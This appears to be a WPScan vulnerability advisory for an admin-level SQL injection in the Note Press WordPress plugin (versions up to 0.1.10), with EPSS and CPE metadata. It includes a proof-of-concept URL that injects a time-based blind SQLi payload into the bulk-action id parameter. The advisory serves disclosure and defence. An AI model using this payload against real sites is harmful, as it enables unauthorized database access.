Lucene search

K
wpvulndbDaniel KrohmerWPVDB-ID:54E16F0A-667C-44EA-98AD-0306C4A35D9D
HistoryMay 09, 2022 - 12:00 a.m.

Note Press <= 0.1.10 - Admin+ SQLi via Bulk Actions

2022-05-0900:00:00
Daniel Krohmer
wpscan.com
3

0.001 Low

EPSS

Percentile

21.8%

The plugin does not sanitise and escape the ids from the bulk actions before using them in a SQL statement in an admin page, leading to an SQL injection

PoC

https;//example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&_wpnonce=e4ee1ce89d&action;=delete&paged;=1&id;%5B%5D=18+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)&id;%5B%5D=19&action2;=delete

CPENameOperatorVersion
note-presseq*

0.001 Low

EPSS

Percentile

21.8%

Related for WPVDB-ID:54E16F0A-667C-44EA-98AD-0306C4A35D9D